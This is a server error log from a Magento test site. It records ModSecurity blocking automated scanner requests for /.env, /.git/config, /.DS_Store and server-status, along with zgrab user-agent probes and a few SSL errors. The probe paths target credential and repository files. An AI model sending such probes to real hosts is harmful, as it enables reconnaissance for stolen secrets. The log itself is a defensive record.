| Current Path : /var/www/magento.test.indacotrentino.com/log/ |
| Current File : /var/www/magento.test.indacotrentino.com/log/economiasolidal-error.log |
[Wed Jul 26 14:50:57.487654 2023] [authz_core:error] [pid 976425] [client 162.243.186.177:44246] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Jul 26 14:50:58.706077 2023] [:error] [pid 976422] [client 162.243.186.177:44342] [client 162.243.186.177] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZMEWsrWfzAuwdxK7-Q82sQAAAA0"]
[Wed Jul 26 14:50:58.706309 2023] [:error] [pid 976422] [client 162.243.186.177:44342] [client 162.243.186.177] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZMEWsrWfzAuwdxK7-Q82sQAAAA0"]
[Wed Jul 26 14:50:58.706513 2023] [:error] [pid 976422] [client 162.243.186.177:44342] [client 162.243.186.177] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZMEWsrWfzAuwdxK7-Q82sQAAAA0"]
[Wed Jul 26 14:50:58.900345 2023] [:error] [pid 976424] [client 162.243.186.177:44354] [client 162.243.186.177] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZMEWsuk4LCqyAaANqbZukQAAAAc"]
[Wed Jul 26 14:50:58.900558 2023] [:error] [pid 976424] [client 162.243.186.177:44354] [client 162.243.186.177] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZMEWsuk4LCqyAaANqbZukQAAAAc"]
[Wed Jul 26 14:50:58.900701 2023] [:error] [pid 976424] [client 162.243.186.177:44354] [client 162.243.186.177] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZMEWsuk4LCqyAaANqbZukQAAAAc"]
[Wed Jul 26 14:50:59.088173 2023] [:error] [pid 976422] [client 162.243.186.177:44366] [client 162.243.186.177] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZMEWs7WfzAuwdxK7-Q82sgAAAA0"]
[Wed Jul 26 14:50:59.088399 2023] [:error] [pid 976422] [client 162.243.186.177:44366] [client 162.243.186.177] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZMEWs7WfzAuwdxK7-Q82sgAAAA0"]
[Wed Jul 26 14:50:59.088545 2023] [:error] [pid 976422] [client 162.243.186.177:44366] [client 162.243.186.177] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZMEWs7WfzAuwdxK7-Q82sgAAAA0"]
[Wed Jul 26 18:51:36.711755 2023] [:error] [pid 978575] [client 171.67.70.233:40496] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZMFPGKPWZpwuVzt_fiK-fgAAAAA"]
[Wed Jul 26 18:51:36.712202 2023] [:error] [pid 978575] [client 171.67.70.233:40496] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZMFPGKPWZpwuVzt_fiK-fgAAAAA"]
[Wed Jul 26 18:51:36.712375 2023] [:error] [pid 978575] [client 171.67.70.233:40496] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZMFPGKPWZpwuVzt_fiK-fgAAAAA"]
[Wed Jul 26 18:51:52.514102 2023] [:error] [pid 979253] [client 171.67.70.233:50874] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZMFPKH421FX8opQNhCR5-AAAAAQ"]
[Wed Jul 26 18:51:52.514531 2023] [:error] [pid 979253] [client 171.67.70.233:50874] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZMFPKH421FX8opQNhCR5-AAAAAQ"]
[Wed Jul 26 18:51:52.514706 2023] [:error] [pid 979253] [client 171.67.70.233:50874] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "ZMFPKH421FX8opQNhCR5-AAAAAQ"]
[Thu Jul 27 06:16:23.333675 2023] [ssl:error] [pid 985532] [client 137.226.113.15:48532] AH02261: Re-negotiation handshake failed
[Thu Jul 27 06:16:23.333718 2023] [ssl:error] [pid 985532] SSL Library Error: error:14094153:SSL routines:ssl3_read_bytes:no renegotiation
[Thu Jul 27 14:53:06.314790 2023] [ssl:error] [pid 991489] [client 137.226.113.15:37184] AH02261: Re-negotiation handshake failed
[Thu Jul 27 14:53:06.314846 2023] [ssl:error] [pid 991489] SSL Library Error: error:14094153:SSL routines:ssl3_read_bytes:no renegotiation
[Sat Jul 29 05:50:59.803856 2023] [:error] [pid 1026833] [client 18.222.143.90:44730] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v1/.git/config"] [unique_id "ZMSMo5I37g2UFZcDSq72NQAAAAQ"]
[Sat Jul 29 05:50:59.810090 2023] [:error] [pid 1029094] [client 18.222.143.90:44736] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v4/.git/config"] [unique_id "ZMSMo7ZKcTjH6iUwxOkx-gAAAAc"]
[Sat Jul 29 05:50:59.810126 2023] [:error] [pid 1026833] [client 18.222.143.90:44730] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v1/.git/config"] [unique_id "ZMSMo5I37g2UFZcDSq72NQAAAAQ"]
[Sat Jul 29 05:50:59.810313 2023] [:error] [pid 1026833] [client 18.222.143.90:44730] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v1/.git/config"] [unique_id "ZMSMo5I37g2UFZcDSq72NQAAAAQ"]
[Sat Jul 29 05:50:59.810405 2023] [:error] [pid 1029094] [client 18.222.143.90:44736] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v4/.git/config"] [unique_id "ZMSMo7ZKcTjH6iUwxOkx-gAAAAc"]
[Sat Jul 29 05:50:59.810589 2023] [:error] [pid 1029094] [client 18.222.143.90:44736] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v4/.git/config"] [unique_id "ZMSMo7ZKcTjH6iUwxOkx-gAAAAc"]
[Sat Jul 29 05:50:59.818877 2023] [:error] [pid 1026830] [client 18.222.143.90:44752] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/v4/.git/config"] [unique_id "ZMSMo60f8dGtNkSGjNsx0AAAAAE"]
[Sat Jul 29 05:50:59.819117 2023] [:error] [pid 1026830] [client 18.222.143.90:44752] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/v4/.git/config"] [unique_id "ZMSMo60f8dGtNkSGjNsx0AAAAAE"]
[Sat Jul 29 05:50:59.819287 2023] [:error] [pid 1026830] [client 18.222.143.90:44752] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/v4/.git/config"] [unique_id "ZMSMo60f8dGtNkSGjNsx0AAAAAE"]
[Sat Jul 29 05:50:59.820316 2023] [:error] [pid 1026829] [client 18.222.143.90:44734] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v3/.git/config"] [unique_id "ZMSMo1a-sNsZ5n7HAcWNogAAAAA"]
[Sat Jul 29 05:50:59.820539 2023] [:error] [pid 1026829] [client 18.222.143.90:44734] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v3/.git/config"] [unique_id "ZMSMo1a-sNsZ5n7HAcWNogAAAAA"]
[Sat Jul 29 05:50:59.820675 2023] [:error] [pid 1026829] [client 18.222.143.90:44734] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/admin/v3/.git/config"] [unique_id "ZMSMo1a-sNsZ5n7HAcWNogAAAAA"]
[Sat Jul 29 05:50:59.826643 2023] [:error] [pid 1028943] [client 18.222.143.90:44768] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZMSMo_YvMCMU4h3nTuI_OwAAAAY"]
[Sat Jul 29 05:50:59.826875 2023] [:error] [pid 1028943] [client 18.222.143.90:44768] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZMSMo_YvMCMU4h3nTuI_OwAAAAY"]
[Sat Jul 29 05:50:59.827024 2023] [:error] [pid 1028943] [client 18.222.143.90:44768] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZMSMo_YvMCMU4h3nTuI_OwAAAAY"]
[Sat Jul 29 05:50:59.832856 2023] [:error] [pid 1026832] [client 18.222.143.90:44778] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /application/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.git/config"] [unique_id "ZMSMoxLEJHbrIXm2t_mCDgAAAAM"]
[Sat Jul 29 05:50:59.833076 2023] [:error] [pid 1026832] [client 18.222.143.90:44778] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.git/config"] [unique_id "ZMSMoxLEJHbrIXm2t_mCDgAAAAM"]
[Sat Jul 29 05:50:59.833207 2023] [:error] [pid 1026832] [client 18.222.143.90:44778] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.git/config"] [unique_id "ZMSMoxLEJHbrIXm2t_mCDgAAAAM"]
[Sat Jul 29 05:50:59.903467 2023] [:error] [pid 1026831] [client 18.222.143.90:44810] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZMSMo9UbAgB5eIusnpmUWwAAAAI"]
[Sat Jul 29 05:50:59.903765 2023] [:error] [pid 1026831] [client 18.222.143.90:44810] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZMSMo9UbAgB5eIusnpmUWwAAAAI"]
[Sat Jul 29 05:50:59.903928 2023] [:error] [pid 1026831] [client 18.222.143.90:44810] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "ZMSMo9UbAgB5eIusnpmUWwAAAAI"]
[Sat Jul 29 05:50:59.908919 2023] [:error] [pid 1026837] [client 18.222.143.90:44788] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /__macosx/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/__MACOSX/.git/config"] [unique_id "ZMSMo6NEleSPIL4joq5eogAAAAU"]
[Sat Jul 29 05:50:59.909215 2023] [:error] [pid 1026837] [client 18.222.143.90:44788] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/__MACOSX/.git/config"] [unique_id "ZMSMo6NEleSPIL4joq5eogAAAAU"]
[Sat Jul 29 05:50:59.909392 2023] [:error] [pid 1026837] [client 18.222.143.90:44788] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/__MACOSX/.git/config"] [unique_id "ZMSMo6NEleSPIL4joq5eogAAAAU"]
